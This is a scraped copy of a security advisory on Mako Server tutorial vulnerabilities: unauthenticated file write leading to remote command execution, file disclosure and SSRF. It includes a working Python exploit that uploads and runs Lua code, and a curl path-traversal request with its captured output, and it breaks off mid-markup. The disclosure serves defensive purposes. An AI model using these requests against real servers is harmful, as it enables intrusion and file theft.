{"id":9068,"date":"2017-09-03T14:19:14","date_gmt":"2017-09-03T22:19:14","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/09\/03\/news-2841\/"},"modified":"2017-09-03T14:19:14","modified_gmt":"2017-09-03T22:19:14","slug":"news-2841","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/09\/03\/news-2841\/","title":{"rendered":"SSD Advisory \u2013 Mako Web-server Tutorials Multiple Unauthenticated Vulnerabilities"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Sun, 03 Sep 2017 06:38:44 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3391\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3391');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describe three (3) vulnerabilities found in Mako Server&#8217;s tutorial page.<\/p>\n<p>The vulnerabilities found are:<\/p>\n<ul>\n<li>Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution<\/li>\n<li>Unauthenticated File Disclosure<\/li>\n<li>Unauthenticated Server Side Request Forgery<\/li>\n<\/ul>\n<p>As these tutorial may be used as the basis for production code, it is important for users to be aware of these issues.<\/p>\n<p>&#8220;As a compact application and web server, the Mako Server helps developers rapidly design secure IoT and web applications. The Mako Server provides an application server environment from which developers can design and implement complete, custom solutions. The Mako Web Server is ideal for embedded Linux systems.&#8221;<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, John Page AKA hyp3rlinx, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> RealTimeLogic was informed of the vulnerability on Aug 13, but while acknowledging the receipt of the vulnerability information, refused to respond to the technical claims, to give a fix timeline or coordinate an advisory, saying:<br \/> &#8220;I just sent a formal notification for the commercial license requirement and also we need to put a maintenance contract in place.<\/p>\n<p>Internally I need to set-up a cost allocation account for billing against these support inquiries.&#8221;<\/p>\n<p>At this time it&#8217;s unclear whether these vulnerabilities are going to be fixed and further attempts to get a status clarification failed.<\/p>\n<p><span id=\"more-3391\"><\/span><\/p>\n<p><u><strong>Vulnerabilities details<\/strong><\/u><\/p>\n<p><strong>Unauthenticated Arbitrary File Write vulnerability that leads to Remote Command Execution<\/strong><br \/> Mako web-server tutorial does not sufficiently sanitizing the HTTP PUT requests, when an attacker send HTTP PUT request to &#8216;<em>save.lsp<\/em>&#8216; web page, the input passed to a function responsible for accessing the filesystem.<\/p>\n<p>The attacker input will be saved on the victims machine and can be execute by sending HTTP GET request to &#8216;<em>manage.lsp<\/em>&#8216;<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59ac7fe2494bd023760358\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> HTTP PUT  &#8216;http:\/\/VICTIM-IP\/examples\/save.lsp?ex=2.1&#8217;  HTTP GET  &#8216;http:\/\/VICTIM-IP\/examples\/manage.lsp?execute=true&amp;ex=2.1&amp;type=lua&#8217;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0005 seconds] -->  <\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59ac7fe2494c6765741110\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import urllib2,time    #MakoServer v2.5 Remote Command Execution 0day  #Credits: John Page AKA hyp3rlinx  #=========================================    print  &#8216;MakoServer v2.5 Remote Command Execution&#8217;    CMD=&#8221;os.execute(&#8216;c:\/Windows\/system32\/calc.exe&#8217;)&#8221;    opener = urllib2.build_opener(urllib2.HTTPHandler)  request = urllib2.Request(&#8216;http:\/\/IP\/examples\/save.lsp?ex=2.1&#8217;, data=CMD)  request.add_header(&#8216;Content-Type&#8217;, &#8216;text\/plain;charset=UTF-8&#8217;)  request.add_header(&#8216;X-Requested-With&#8217;, &#8216;XMLHttpRequest&#8217;)  request.add_header(&#8216;Referer&#8217;, &#8216;http:\/\/localhost\/Lua-Types.lsp&#8217;)  request.get_method = lambda: &#8216;PUT&#8217;  opener.open(request)    time.sleep(1)    urllib2.urlopen(&#8216;http:\/\/IP\/examples\/manage.lsp?execute=true&amp;ex=2.1&amp;type=lua&#8217;)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c6765741110-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c6765741110-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c6765741110-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c6765741110-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c6765741110-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c6765741110-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c6765741110-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c6765741110-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c6765741110-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c6765741110-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c6765741110-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c6765741110-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c6765741110-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c6765741110-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c6765741110-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c6765741110-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c6765741110-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c6765741110-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c6765741110-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c6765741110-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c6765741110-21\">21<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c6765741110-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">urllib2<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">time<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c6765741110-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c6765741110-3\"><span class=\"crayon-p\">#MakoServer v2.5 Remote Command Execution 0day<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c6765741110-4\"><span class=\"crayon-p\">#Credits: John Page AKA hyp3rlinx<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c6765741110-5\"><span class=\"crayon-p\">#=========================================<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c6765741110-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c6765741110-7\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;MakoServer v2.5 Remote Command Execution&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c6765741110-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c6765741110-9\"><span class=\"crayon-v\">CMD<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;os.execute(&#8216;c:\/Windows\/system32\/calc.exe&#8217;)&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c6765741110-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c6765741110-11\"><span class=\"crayon-v\">opener<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">urllib2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">build_opener<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">urllib2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">HTTPHandler<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c6765741110-12\"><span class=\"crayon-v\">request<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">urllib2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">Request<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;http:\/\/IP\/examples\/save.lsp?ex=2.1&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">CMD<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c6765741110-13\"><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_header<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;Content-Type&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;text\/plain;charset=UTF-8&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c6765741110-14\"><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_header<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;X-Requested-With&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;XMLHttpRequest&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c6765741110-15\"><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">add_header<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;Referer&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;http:\/\/localhost\/Lua-Types.lsp&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c6765741110-16\"><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">get_method<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lambda<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;PUT&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c6765741110-17\"><span class=\"crayon-v\">opener<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c6765741110-18\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c6765741110-19\"><span class=\"crayon-v\">time<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">sleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c6765741110-20\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c6765741110-21\"><span class=\"crayon-v\">urllib2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">urlopen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;http:\/\/IP\/examples\/manage.lsp?execute=true&amp;ex=2.1&amp;type=lua&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0021 seconds] -->  <\/p>\n<p><strong>Unauthenticated File Disclosure<\/strong><br \/> Mako web-server tutorial is not sufficiently sanitizing GET requests, when an attacker send GET request to the URI <em>IP\/fs\/..\/..<\/em>, the input passed without modification and the response with the file content is returned.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> The following GET request will response with the <em>C\/Windows\/system.ini<\/em> content:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59ac7fe2494c9312578179\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> curl -v http:\/\/VICTIM-IP\/fs\/C\/Windows\/system.ini    * About to connect() to VICTIM-IP port 80  *   Trying VICTIM-IP&#8230; connected  * Connected to VICTIM-IP (VICTIM-IP) port 80  &gt; GET \/fs\/C\/Windows\/system.ini HTTP\/1.1  &gt; User-Agent: curl\/7.15.5 (x86_64-redhat-linux-gnu) libcurl\/7.15.5 OpenSSL\/0.9.8b zlib\/1.2.3 libidn\/0.6.5  &gt; Host: VICTIM-IP  &gt; Accept: *\/*  &gt;   &lt; HTTP\/1.1 200 OK  &lt; Date: Mon, 07 Aug 2017 22:21:27 GMT  &lt; Server: MakoServer.net  &lt; Content-Type: application\/octet-stream  &lt; Accept-Ranges: bytes  &lt; Etag: 58b4be20  &lt; Last-Modified: Tue, 28 Feb 2017 00:02:40 GMT  &lt; Content-Length: 219  &lt; Keep-Alive: Keep-Alive  ; for 16-bit app support  [386Enh]  woafont=dosapp.fon  EGA80WOA.FON=EGA80WOA.FON  EGA40WOA.FON=EGA40WOA.FON  CGA80WOA.FON=CGA80WOA.FON  CGA40WOA.FON=CGA40WOA.FON    [drivers]  wave=mmdrv.dll  timer=timer.drv    [mci]<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c9312578179-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c9312578179-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c9312578179-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c9312578179-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c9312578179-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c9312578179-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c9312578179-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c9312578179-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c9312578179-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c9312578179-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c9312578179-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c9312578179-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c9312578179-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c9312578179-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c9312578179-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c9312578179-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c9312578179-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c9312578179-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c9312578179-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c9312578179-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c9312578179-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c9312578179-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c9312578179-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c9312578179-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c9312578179-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c9312578179-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c9312578179-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c9312578179-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c9312578179-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c9312578179-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59ac7fe2494c9312578179-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59ac7fe2494c9312578179-32\">32<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c9312578179-1\"><span class=\"crayon-v\">curl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">v<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/VICTIM-IP\/fs\/C\/Windows\/system.ini<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c9312578179-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c9312578179-3\"><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">About <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">connect<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">VICTIM<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">IP <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">80<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c9312578179-4\"><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-e\">Trying <\/span><span class=\"crayon-v\">VICTIM<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">IP<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">connected<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c9312578179-5\"><span class=\"crayon-e\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Connected <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">VICTIM<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">VICTIM<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">IP<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">80<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c9312578179-6\"><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">fs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">C<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">Windows<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">system<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">ini <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59ac7fe2494c9312578179-7\"><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">curl<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">7.15.5<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">x86_64<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">redhat<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">linux<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">gnu<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">libcurl<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">7.15.5<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">OpenSSL<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0.9.8b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">zlib<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.2.3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">libidn<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0.6.5<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59ac7fe2494c9312578179-8\"><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">VICTIM<\/span><span class=\"crayon-o\">&#8211;<\/span><span 